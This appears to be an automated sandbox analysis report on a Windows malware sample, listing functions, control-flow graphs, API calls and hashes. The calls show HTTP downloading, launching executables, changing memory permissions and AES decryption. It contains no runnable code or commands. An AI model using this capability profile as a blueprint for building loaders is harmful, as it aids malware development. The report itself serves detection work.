                                                                    control_flow_graph 1082 10001175-100011a6 call 1000e8e7 1085 100011a8-100011b0 call 1000270d 1082->1085 1086 100011bf 1082->1086 1089 100011b5-100011bd 1085->1089 1088 100011c5-100011dd InternetSetFilePointer 1086->1088 1090 100011e3-1000121b InternetReadFile 1088->1090 1089->1088 1091 10001253-1000125a 1090->1091 1092 1000121d-1000124d call 1000270d call 100050e0 call 10002724 1090->1092 1094 10001260-100012a0 call 10003c40 HttpQueryInfoA 1091->1094 1095 1000125c-1000125e 1091->1095 1092->1091 1101 100012a6-100012d2 CoCreateInstance 1094->1101 1102 1000150a-10001520 call 1000e8a5 1094->1102 1095->1090 1095->1094 1101->1102 1105 100012d8-100012df 1101->1105 1105->1102 1108 100012e5-10001316 call 1000184b call 10001006 1105->1108 1113 10001318 1108->1113 1114 1000131a-10001351 call 10001c08 call 10001bb9 1108->1114 1113->1114 1120 10001357-1000135e 1114->1120 1121 100014fe-10001505 1114->1121 1120->1121 1122 10001364-100013cc call 1000270d 1120->1122 1121->1102 1126 100013d2-100013e8 1122->1126 1127 100014e6-100014f9 call 10002724 1122->1127 1128 10001486-10001497 1126->1128 1129 100013ee-1000141d call 1000270d 1126->1129 1127->1121 1132 10001499-1000149b 1128->1132 1133 100014dc-100014e4 1128->1133 1138 1000146e-10001483 call 10002724 1129->1138 1139 1000141f-10001421 1129->1139 1136 100014aa-100014ac 1132->1136 1137 1000149d-100014a8 call 10005926 1132->1137 1133->1127 1141 100014c0-100014d1 call 10003c40 call 10005926 1136->1141 1142 100014ae-100014be call 100050e0 1136->1142 1154 100014d7 call 1000584c 1137->1154 1138->1128 1144 10001423-10001425 1139->1144 1145 10001434-10001447 call 10003c40 1139->1145 1141->1154 1142->1133 1144->1145 1151 10001427-10001432 call 100050e0 1144->1151 1161 10001456-1000145c 1145->1161 1162 10001449-10001454 call 10005926 1145->1162 1151->1138 1154->1133 1161->1138 1163 1000145e-10001463 call 10005926 1161->1163 1168 10001469 call 1000584c 1162->1168 1163->1168 1168->1138
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 1000117F
                                                                    • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 100011DD
                                                                    • InternetReadFile.WININET(?,?,000003E8,?), ref: 100011FB
                                                                    • HttpQueryInfoA.WININET(?,0000001D,?,00000103,00000000), ref: 10001298
                                                                    • CoCreateInstance.OLE32(?,00000000,00000001,100111B0,?), ref: 100012CA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FileInternet$CreateH_prolog3_HttpInfoInstancePointerQueryRead
                                                                    • String ID: text
                                                                    • API String ID: 1154000607-999008199
                                                                    • Opcode ID: ef5d7d216a18ec56db342af81d74b206b9fa8c043ee2a269581b6d989e9df7a9
                                                                    • Instruction ID: b002d723a568eb8b1b2c33cfea8b8604ab2d7fe63d6740fb25dc42610badb9b0
                                                                    • Opcode Fuzzy Hash: ef5d7d216a18ec56db342af81d74b206b9fa8c043ee2a269581b6d989e9df7a9
                                                                    • Instruction Fuzzy Hash: 62B14975900229AFEB65CF24CC85BDAB7B8FF09355F1041D9E508A7265DB70AE80CF90
                                                                    Function 10001F20 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 182processCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 10005956: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,10001F48,00000000), ref: 10005969
                                                                      • Part of subcall function 10005956: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1000599A
                                                                    • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 1000212B
                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 10002155
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: Time$CreateExecuteFileProcessShellSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: .exe$open
                                                                    • API String ID: 1627157292-49952409
                                                                    • Opcode ID: e4384984b18e181fb1594b7b9fac09415766b676974dc2044245fe05013f5668
                                                                    • Instruction ID: 97952a91a625a221cb26b3956644a393a6e3da00256d77b8c5daa8cab0653b15
                                                                    • Opcode Fuzzy Hash: e4384984b18e181fb1594b7b9fac09415766b676974dc2044245fe05013f5668
                                                                    • Instruction Fuzzy Hash: 40514B715083809BE724DF64C881EDFB7E8FB95394F004A2EF69986195DB70A944CB62
                                                                    Function 00401D60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1237 401d60-401dae 1238 401db2-401db7 1237->1238 1238->1238 1239 401db9-402013 call 402470 call 402650 call 402470 call 40a3e0 call 40c34c InternetOpenA 1238->1239 1254 402015-402021 1239->1254 1255 40203d-40205a call 408ec2 1239->1255 1256 402033-40203a call 409027 1254->1256 1257 402023-402031 1254->1257 1256->1255 1257->1256 1259 402062-402099 call 40c26f call 401d60 1257->1259
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: http://
                                                                    • API String ID: 0-1121587658
                                                                    • Opcode ID: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                                    • Instruction ID: beb1f9afae3dc46702148b7d116b1b3e2c798cd3d3ea86b197954d74152ad0ce
                                                                    • Opcode Fuzzy Hash: abedc0d90a1f4d3688eb9c4f017047df236718ab065654b8d82d4035641d8820
                                                                    • Instruction Fuzzy Hash: F451C371E002099FDB14CFA8C885BEEBBB5EF48314F20812EE915B72C1D7799945CBA4
                                                                    Function 004020C0 Relevance: 4.6, APIs: 3, Instructions: 53fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1268 4020c0-4020db 1269 40213b-40214c call 408ec2 1268->1269 1270 4020dd-4020e1 1268->1270 1270->1269 1272 4020e3-402101 CreateFileA 1270->1272 1272->1269 1274 402103-402130 WriteFile CloseHandle call 408ec2 1272->1274 1276 402135-402138 1274->1276
                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 004020F6
                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00402117
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040211E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleWrite
                                                                    • String ID:
                                                                    • API String ID: 1065093856-0
                                                                    • Opcode ID: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                                    • Instruction ID: 54406537bc71ee86772d4e0f102f4040d02d69394e2def86726d8d124470bd26
                                                                    • Opcode Fuzzy Hash: 8b77efdb325a00ac37aead48d1dd076f0e9ed27c116024a8a8daefa345587264
                                                                    • Instruction Fuzzy Hash: 4401D671610204ABD720DF68DD49FEEB7A8EB48725F00053EFA45AA2D0DAB46945C758
                                                                    Function 00E80E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1298 e80e0f-e80e24 SetErrorMode * 2 1299 e80e2b-e80e2c 1298->1299 1300 e80e26 1298->1300 1300->1299
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000400,?,?,00E80223,?,?), ref: 00E80E19
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,00E80223,?,?), ref: 00E80E1E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorMode
                                                                    • String ID:
                                                                    • API String ID: 2340568224-0
                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                    • Instruction ID: 34b653c2dc5dadcc2651f6bcb337af8a023bc7c0bed43e17be107cd3fc2d115a
                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                    • Instruction Fuzzy Hash: 45D0123114512877DB403A94DC09BCE7B1CDF05B66F008411FB0DE9080C770994047E5
                                                                    Function 00AA359A Relevance: 1.6, APIs: 1, Instructions: 122memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,00AA3596,00000004,?), ref: 00AA3636
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000AA2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_aa2000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: de12bafecc2530df9efbd6cf182ebc136d0b01a7ffe5fa73dcc0002c1f416683
                                                                    • Instruction ID: 769b0f7eaf8e9c3194317a445979826e0d3aed7d8ab4f2251e65705fe60bfc66
                                                                    • Opcode Fuzzy Hash: de12bafecc2530df9efbd6cf182ebc136d0b01a7ffe5fa73dcc0002c1f416683
                                                                    • Instruction Fuzzy Hash: BD31A1F750C2167EEB01CE159A10AFB376DEBD3720B34802AF801C7A82D3655E155639
                                                                    Function 00AA35AB Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,00AA3596,00000004,?), ref: 00AA3636
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000AA2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_aa2000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: d43fce2ee58e1ba4b7303565dae311f173d2388b2eeed287dcc6b912ee1570b2
                                                                    • Instruction ID: 5bad60c082ee768296ed2c77f441393f82c901bdf53416376523a8ce652617ff
                                                                    • Opcode Fuzzy Hash: d43fce2ee58e1ba4b7303565dae311f173d2388b2eeed287dcc6b912ee1570b2
                                                                    • Instruction Fuzzy Hash: 041181B390920AAFEF40CF159A44AAF7769EFD6720F348416F801C7A85C3755E249729
                                                                    Function 00AA35C6 Relevance: 1.6, APIs: 1, Instructions: 63memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNEL32(?,00AA3596,00000004,?), ref: 00AA3636
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000AA2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AA2000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_aa2000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: b862117d27f85cd84fa2917d22e7f13e4331aba6759ca44eb9ee7deb113357d1
                                                                    • Instruction ID: a59e1c5ac33bc73d76c8550af82620ac40288bd0ee92fddddc0d172866cf53e2
                                                                    • Opcode Fuzzy Hash: b862117d27f85cd84fa2917d22e7f13e4331aba6759ca44eb9ee7deb113357d1
                                                                    • Instruction Fuzzy Hash: BD11C4B360420AAFEF00CE158A04AEB3765EF96320F348426F801C7A81C3755E219629
                                                                    Function 009A22C4 Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_99d000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: a7bc5add78922d73a9499dd7d78903ce499d0649daa8122f62c0a14b9430987d
                                                                    • Instruction ID: e2ff5291c08e46e21a775263e56d772a9931f117b7f127a7dda4597b6599cc35
                                                                    • Opcode Fuzzy Hash: a7bc5add78922d73a9499dd7d78903ce499d0649daa8122f62c0a14b9430987d
                                                                    • Instruction Fuzzy Hash: D50112B240E304EFC741AF25988447AFBF4FF15721F5A4C1DE8C986600D6359990EB97
                                                                    Function 009A33C3 Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.000000000099D000.00000040.00000001.01000000.00000003.sdmp, Offset: 0099D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_99d000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: cad59f033554f98692acc1e301306503d8627c2d6ef33ac4952f03ac4910fcad
                                                                    • Instruction ID: 0dcf3fd80cd97029181ec2417e11feb7dbe780f22d46465859339e191d008b4c
                                                                    • Opcode Fuzzy Hash: cad59f033554f98692acc1e301306503d8627c2d6ef33ac4952f03ac4910fcad
                                                                    • Instruction Fuzzy Hash: 111153B240E300EFD341AF24988447AFBF4FF06721F1A4C1EE8C58A100D23598A1EB97
                                                                    Function 0041249E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,0040A15B,?,?,?,004010EC,?,004034A7,?,?,?), ref: 004124D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                                    • Instruction ID: ad8272dea5af250e00f6a395d7f300feb0e2b911a381963764dc482fc342fffd
                                                                    • Opcode Fuzzy Hash: 493f356888a0dcd889554c34f33c7b2690b2cf14b3e600665f7a64bb4c109bb9
                                                                    • Instruction Fuzzy Hash: B4E03031205225AAD73126A69E00BDB3A589B417A4F154233EC04E66D1DBAC9CE182AD
                                                                    Function 100079EE Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000000,10001F83,?,?,10002743,10001F83,?,10001F83,0007A120), ref: 10007A20
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3223708397.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.3223691367.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223729109.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3223747769.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 1279760036-0
                                                                    • Opcode ID: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                                    • Instruction ID: 0f7b013f9e5e8caa32c185eac4a395cd376aa25861a87a311eefda30a96e0e36
                                                                    • Opcode Fuzzy Hash: f1ff2abc0f9b0129279cb81424fa89791b5c74a503f020079eb334c9f6e41783
                                                                    • Instruction Fuzzy Hash: 2FE0A035B0012266F711EA698C00B8F3A89FB832F0F124120AC489209ADA68DE0181E2
                                                                    Function 0040E268 Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0040E27B
                                                                      • Part of subcall function 00411AC2: RtlFreeHeap.NTDLL(00000000,00000000,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?), ref: 00411AD8
                                                                      • Part of subcall function 00411AC2: GetLastError.KERNEL32(?,?,00417074,?,00000000,?,?,?,0041709B,?,00000007,?,?,0041737A,?,?), ref: 00411AEA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFreeHeapLast_free
                                                                    • String ID:
                                                                    • API String ID: 1353095263-0
                                                                    • Opcode ID: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                                    • Instruction ID: def2e2de252ffdbb94672f6279d5865abf5ab7644d9ffbe49541578f7e328dd5
                                                                    • Opcode Fuzzy Hash: db01065975d67949ddfc68d95b64cc0fb921476d903cbe9e9cdf5676f9f73183
                                                                    • Instruction Fuzzy Hash: 82C08C31100208BBCB00DB46C806B8E7FA8DB803A8F204049F40417251DAB1EE409680
                                                                    Function 00D9A065 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00D9A0B6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D99000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_d99000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                    • Instruction ID: e095eccbdefd9456288b30fbfba45d82e60c3743a789a76298d1ab933540fe39
                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                    • Instruction Fuzzy Hash: 16113C79A00208EFDB01DF98C985E98BBF5EF08750F158094F9489B362D371EA90DF91
                                                                    Function 00402BF0 Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00402BFF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                                    • Instruction ID: c3e6f36c677934e3fb1d6ceeea9da9d01375f90aa72a3d22a0593b590ebbe711
                                                                    • Opcode Fuzzy Hash: ca1f9d2fe36c7284753979306af93d0cb1d2fe33a661f06d3f51028e1cfc8f97
                                                                    • Instruction Fuzzy Hash: F7C0013200020DFBCF025F81EC0489A7F2AEB09264F008020FA1804021C7329931ABA9
                                                                    Function 00402C10 Relevance: 1.3, APIs: 1, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualFree.KERNELBASE(?,?,?), ref: 00402C1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3219817700.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3219817700.000000000042A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                                    • Instruction ID: 60d78a83612f02709208ad56537e98f16bf966ab6139b9664c308e167d28ca00
                                                                    • Opcode Fuzzy Hash: 5ceef4664e2463bb707098a5d0699c231cbc0156091deadbe1fb1452187b7f9f
                                                                    • Instruction Fuzzy Hash: 61B0923244020CFBCF021F81EC048D93F2AFB08264F008024FA1C44031C733D531AB84

                                                                    Non-executed Functions

                                                                    Function 00E83B27 Relevance: 31.4, APIs: 9, Strings: 8, Instructions: 1645COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: DFEK$FOKD$]DFE$rB$rB$rB$rB$rB
                                                                    • API String ID: 0-735762442
                                                                    • Opcode ID: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                                    • Instruction ID: 43d4528cecb88308f3f6741d71b7c28e50935321e00360ac77c5189546c4c90b
                                                                    • Opcode Fuzzy Hash: b634da6b4ff11c5db356e861f82a2c18836c59c7cb790a52b1b2f21f6beabc7d
                                                                    • Instruction Fuzzy Hash: DBE2BDB1D002589BDB24FB64CC49BEDB7B4AF11304F5091E8E51D3B292DB759A88CFA1
                                                                    Function 00E83727 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 225encryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042A018), ref: 00E837A7
                                                                    • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00E837CB
                                                                    • _mbstowcs.LIBCMT ref: 00E8381E
                                                                    • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 00E83835
                                                                    • GetLastError.KERNEL32 ref: 00E8383F
                                                                    • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00E83867
                                                                    • GetLastError.KERNEL32 ref: 00E83871
                                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00E83881
                                                                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 00E83943
                                                                    • CryptDestroyKey.ADVAPI32(?), ref: 00E839B5
                                                                    Strings
                                                                    • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 00E83783
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e80000_zmTSHkabY6.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease_mbstowcs
                                                                    • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                                    • API String ID: 3642901890-63410773
                                                                    • Opcode ID: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                                    • Instruction ID: 3e7380e6a9e996986df0e5fab1ddc4e5d695f20e6536f56e8ebc352cbd789c5f
                                                                    • Opcode Fuzzy Hash: e8a2417c6fd1f5a0234f20e664ae74c119de5196ead524865740bbc4210dc3f9
                                                                    • Instruction Fuzzy Hash: B2819E71A00218AFEF24AF24CC45B9ABBB5FF89704F1481A9F54DE7291DB319E848F51
                                                                    Function 009839D7 Relevance: 9.2, Strings: 6, Instructions: 1724COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 42(B$7+K$</N$RtSg$tF!$9}o
                                                                    • API String ID: 0-431818091
                                                                    • Opcode ID: 6bf7e8168ddf77ccc7ad43f3e834bec0f921f7e65d16bcb0f6745aa87acfb340
                                                                    • Instruction ID: 8876c9c29971108adc9478358239a20d4dd56f171d5f30d962ef71d102bd6ef6
                                                                    • Opcode Fuzzy Hash: 6bf7e8168ddf77ccc7ad43f3e834bec0f921f7e65d16bcb0f6745aa87acfb340
                                                                    • Instruction Fuzzy Hash: AEB22AF360C2049FE304AE2DEC8567ABBEAEBD4720F16853DE6C5C3744EA3558058697
                                                                    Function 00987081 Relevance: 9.1, Strings: 6, Instructions: 1609COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 'Xow$*_~$>}~~$S:Lw$Xu7@$~]6o
                                                                    • API String ID: 0-390478528
                                                                    • Opcode ID: fe956f05fe3a8fefd82318c6c9a3d7ff66bb8d7dcb0648813c0576beba5e6084
                                                                    • Instruction ID: b7a94377f2b34a6a6f183589ebc8863f4eb5368ed07f7449e90df8be8582516a
                                                                    • Opcode Fuzzy Hash: fe956f05fe3a8fefd82318c6c9a3d7ff66bb8d7dcb0648813c0576beba5e6084
                                                                    • Instruction Fuzzy Hash: 19B2F4F3A0C204AFE304AE2DDC8567AFBE9EF94720F16493DE6C487744EA7558408796
                                                                    Function 00988B62 Relevance: 7.9, Strings: 5, Instructions: 1676COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3220112390.0000000000819000.00000040.00000001.01000000.00000003.sdmp, Offset: 00819000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_819000_zmTSHkabY6.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: >ij$\[j$c+Zc$qg~$~yGf
